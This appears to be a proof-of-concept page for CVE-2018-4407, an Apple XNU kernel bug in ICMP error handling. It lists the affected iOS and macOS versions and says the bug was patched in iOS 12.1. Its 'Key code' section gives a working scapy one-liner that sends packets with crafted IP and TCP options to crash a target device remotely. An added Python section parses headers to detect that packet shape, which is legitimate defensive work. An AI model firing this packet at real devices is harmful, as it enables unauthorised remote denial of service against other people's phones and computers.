
CVE-2018-4407 PoC — Kernel buffer error vulnerability in multiple Apple products

Source
Associated Vulnerability
Title: Kernel buffer error vulnerability in multiple Apple products (CVE-2018-4407)
Description:A memory corruption issue was addressed with improved validation. This issue affected versions prior to iOS 12, macOS Mojave 10.14, tvOS 12, watchOS 5.
Description
CVE-2018-4407 overview and implementation
Readme

## Principle
The idea is to set the other fields of the "icmp" packet to invalid values; the macOS or iPhone kernel does not implement a size check when parsing them, which causes a crash.

### Devices
1. Apple iOS 11 and earlier: all devices
2. Apple macOS High Sierra (highest affected version 10.13.6): all devices
3. Apple macOS Sierra (highest affected version 10.12.6): all devices
4. Apple OS X El Capitan and earlier: all devices

Apple fully fixed this vulnerability in the "iOS 12.1" update released on October 30.

## Key code
```
$ pip install scapy
$ sudo scapy
>>> send(IP(dst="Target IP", options=[IPOption("A"*8)]) / TCP(dport=2323, options=[(19, "1"*18), (19, "2"*18)]))
```

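As an added defensive example (not code from the PoC repository), the following Python parses raw IPv4/TCP header bytes and flags the header shape the PoC above sends: IP options and TCP options present in the same packet. The sample packet, the helper names and the option contents are constructed for this illustration; only port 2323 is taken from the PoC.

```python
import struct

# Added detection example, not code from the PoC repository: inspect raw IPv4/TCP
# header bytes and report whether the packet carries BOTH IP options and TCP options,
# the header shape the CVE-2018-4407 PoC sends so that the kernel's ICMP error path
# has to copy more header bytes than it expects.

def parse_ipv4_tcp(pkt: bytes) -> dict:
    """Return IP/TCP option lengths (bytes), IP protocol and TCP destination port."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _, _, _, _, _, proto, _, _, _ = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4          # IPv4 header length; 20 means no options
    info = {"ip_opts": ihl - 20, "proto": proto, "tcp_opts": 0, "dport": None}
    if proto != 6 or len(pkt) < ihl + 20:
        return info                     # not TCP, or TCP header truncated
    _, dport, _, _, off_flags = struct.unpack("!HHIIH", pkt[ihl:ihl + 14])
    doff = (off_flags >> 12) * 4        # TCP header length; 20 means no options
    info["tcp_opts"] = doff - 20
    info["dport"] = dport
    return info

def matches_cve_2018_4407_shape(pkt: bytes) -> bool:
    """True when the packet is TCP and carries both IP options and TCP options."""
    info = parse_ipv4_tcp(pkt)
    return info["proto"] == 6 and info["ip_opts"] > 0 and info["tcp_opts"] > 0

def build_sample(ip_opts: bytes, tcp_opts: bytes) -> bytes:
    """Constructed sample packet for offline testing (checksums left at zero)."""
    ip_opts += b"\x00" * (-len(ip_opts) % 4)    # options are padded to 32-bit words
    tcp_opts += b"\x00" * (-len(tcp_opts) % 4)
    ihl, doff = 5 + len(ip_opts) // 4, 5 + len(tcp_opts) // 4
    tcp = struct.pack("!HHIIHHHH", 40000, 2323, 0, 0, (doff << 12) | 0x02, 8192, 0, 0) + tcp_opts
    ip = struct.pack("!BBHHHBBH4s4s", 0x40 | ihl, 0, 20 + len(ip_opts) + len(tcp), 1, 0, 64, 6, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2])) + ip_opts
    return ip + tcp

if __name__ == "__main__":
    # NOP-padded IP options plus one MD5-signature-shaped TCP option (kind 19, length 18)
    suspect = build_sample(b"\x01" * 8, b"\x13\x12" + b"\x00" * 16)
    plain = build_sample(b"", b"")
    print(parse_ipv4_tcp(suspect), matches_cve_2018_4407_shape(suspect))
    print(parse_ipv4_tcp(plain), matches_cve_2018_4407_shape(plain))
```

The same check can be applied to packets read from a pcap, since only the IPv4 and TCP header bytes are inspected.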
### Links
- [Chinese explanation](https://www.freebuf.com/vuls/188052.html)
- [English explanation](https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407)
File Snapshot

```
[4.0K] /data/pocs/23197c4f522c3da98aec9a49f0559cd7d2fc46b8
├── [ 785] check_icmp_dos.py
└── [ 797] README.md

0 directories, 2 files
```